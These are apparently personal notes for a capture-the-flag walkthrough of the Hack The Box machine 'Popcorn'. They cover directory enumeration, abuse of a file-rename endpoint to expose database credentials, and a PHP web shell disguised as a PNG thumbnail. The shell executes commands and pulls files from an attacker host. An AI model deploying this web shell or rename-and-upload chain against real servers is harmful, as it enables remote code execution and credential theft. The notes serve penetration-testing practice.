2 :80
http://10.10.10.6/
It works landing page
$ gobuster dir -u http://10.10.10.6 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 90
===============================================================
/index.html (Status: 200) [Size: 177]
/index (Status: 200) [Size: 177]
/test.php (Status: 200) [Size: 47044]
/test (Status: 200) [Size: 47032]
/torrent (Status: 301) [Size: 310] [--> http://10.10.10.6/torrent/]
/rename (Status: 301) [Size: 309] [--> http://10.10.10.6/rename/]
http://10.10.10.6/test | http://10.10.10.6/test.php
PHP Version 5.2.10-2ubuntu6.10
System Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686
Configuration File Path /etc/php5/apache2
Hostname:Port popcorn.hackthebox.gr:80
DOCUMENT_ROOT /var/www
SCRIPT_FILENAME /var/www/test.php
http://10.10.10.6/rename/ | http://10.10.10.6/rename/index.php
Renamer API Syntax: index.php?filename=old_file_path_an_name&newfilename=new_file_path_and_name
# works; can rename file
# tested using >
GET /rename/index.php?filename=/var/www/test.php&newfilename=/var/www/kashz.php HTTP/1.1
http://10.10.10.6/kashz.php
# shows phpinfo
http://10.10.10.6/torrent/
Torrent Hoster
$ gobuster dir -u http://10.10.10.6/torrent/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 90
===============================================================
/index.php (Status: 200) [Size: 11356]
/images (Status: 301) [Size: 317] [--> http://10.10.10.6/torrent/images/]
/upload (Status: 301) [Size: 317] [--> http://10.10.10.6/torrent/upload/]
/download (Status: 200) [Size: 0]
/rss (Status: 200) [Size: 964]
/login.php (Status: 200) [Size: 8371]
/templates (Status: 301) [Size: 320] [--> http://10.10.10.6/torrent/templates/]
/users (Status: 301) [Size: 316] [--> http://10.10.10.6/torrent/users/]
/admin (Status: 301) [Size: 316] [--> http://10.10.10.6/torrent/admin/]
/health (Status: 301) [Size: 317] [--> http://10.10.10.6/torrent/health/]
/browse.php (Status: 200) [Size: 9278]
/comment.php (Status: 200) [Size: 936]
/css (Status: 301) [Size: 314] [--> http://10.10.10.6/torrent/css/]
/edit.php (Status: 200) [Size: 0]
/lib (Status: 301) [Size: 314] [--> http://10.10.10.6/torrent/lib/]
/database (Status: 301) [Size: 319] [--> http://10.10.10.6/torrent/database/]
/secure.php (Status: 200) [Size: 4]
/js (Status: 301) [Size: 313] [--> http://10.10.10.6/torrent/js/]
/logout (Status: 200) [Size: 182]
/logout.php (Status: 200) [Size: 182]
/preview (Status: 200) [Size: 28104]
/config.php (Status: 200) [Size: 0]
/readme (Status: 301) [Size: 317] [--> http://10.10.10.6/torrent/readme/]
/thumbnail.php (Status: 200) [Size: 1789]
/torrents.php (Status: 200) [Size: 6477]
/torrents (Status: 301) [Size: 319] [--> http://10.10.10.6/torrent/torrents/]
/validator.php (Status: 200) [Size: 0]
/hide (Status: 200) [Size: 3765]
/PNG (Status: 301) [Size: 314] [--> http://10.10.10.6/torrent/PNG/]
http://popcorn.htb/torrent/readme/readme.html
Torrent Hoster 2.0
- /database/th_database.sql
- config.php
- go to the url where you uploaded the script and you are good to go. Admin username: admin; password : admin12
# creds don't work on login page
http://10.10.10.6/torrent/database/th_database.sql
[trunacted]
--
-- Table structure for table `users`
--
CREATE TABLE `users` (
`id` int(10) unsigned NOT NULL auto_increment,
`userName` varchar(40) NOT NULL default '',
`password` varchar(40) NOT NULL default '',
`privilege` varchar(10) NOT NULL default '',
`email` varchar(30) NOT NULL default '',
`joined` datetime NOT NULL default '0000-00-00 00:00:00',
`lastconnect` datetime NOT NULL default '0000-00-00 00:00:00',
PRIMARY KEY (`id`),
UNIQUE KEY `userName` (`userName`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=4 ;
--
-- Dumping data for table `users`
--
INSERT INTO `users` VALUES (3, 'Admin', '1844156d4166d94387f1a4ad031ca5fa', 'admin', 'admin@yourdomain.com', '2007-01-06 21:12:46', '2007-01-06 21:12:46');
http://10.10.10.6/torrent/config.php
# cant read it
# trying to rename to config.txt and read it
GET /rename/index.php?filename=/var/www/torrent/config.php&newfilename=/var/www/torrent/config.txt HTTP/1.1
# works
HTTP/1.1 200 OK
OK!
http://10.10.10.6/torrent/config.txt
$CFG->host = "localhost";
$CFG->dbName = "torrenthoster"; //db name
$CFG->dbUserName = "torrent"; //db username
$CFG->dbPassword = "SuperSecret!!"; //db password
# reset the file to not break the system
# doing the same with /torrent/login.php to confirm if its using config.php or hardcoded values
GET /rename/index.php?filename=/var/www/torrent/login.php&newfilename=/var/www/torrent/login.txt HTTP/1.1
HTTP/1.1 200 OK
OK!
http://10.10.10.6/torrent/login.txt
include("config.php");
# cant login; not sure
http://10.10.10.6/torrent/users/index.php?mode=register
# registering a new user kashz:kashz
loggin in > http://10.10.10.6/torrent/index.php
# there is upload section to upload .torrent
Using http://sample-file.bazadanni.com/2012/01/torrent.html
# got a sample torrent and uploaded.
# can edit thumbnail for torrent
# image is uploaded at http://10.10.10.6/torrent/upload/d0d14c926e6e99761a2fdcff27b403d96376eff6.png
# time toi modify
$ cat kashz.png
<?php
if (isset($_REQUEST['cmd'])) {
echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
}
if (isset($_REQUEST['fupload'])) {
file_put_contents($_REQUEST['fupload'], file_get_contents('http://10.10.16.5/' . $_REQUEST['fupload']));
};
?>
# successful upload
# can use rename to modify to php
# writing new file to /var/www/torrents/
GET /rename/index.php?filename=/var/www/torrent/upload/d0d14c926e6e99761a2fdcff27b403d96376eff6.png&newfilename=/var/www/torrent/kashz.php HTTP/1.1
HTTP/1.1 200 OK
OK!
http://10.10.10.6/torrent/kashz.php?cmd=whoami;id;hostname;uname%20-a
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
popcorn
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
# can get web shell using
http://10.10.10.6/torrent/kashz.php?fupload=web.phpLast updated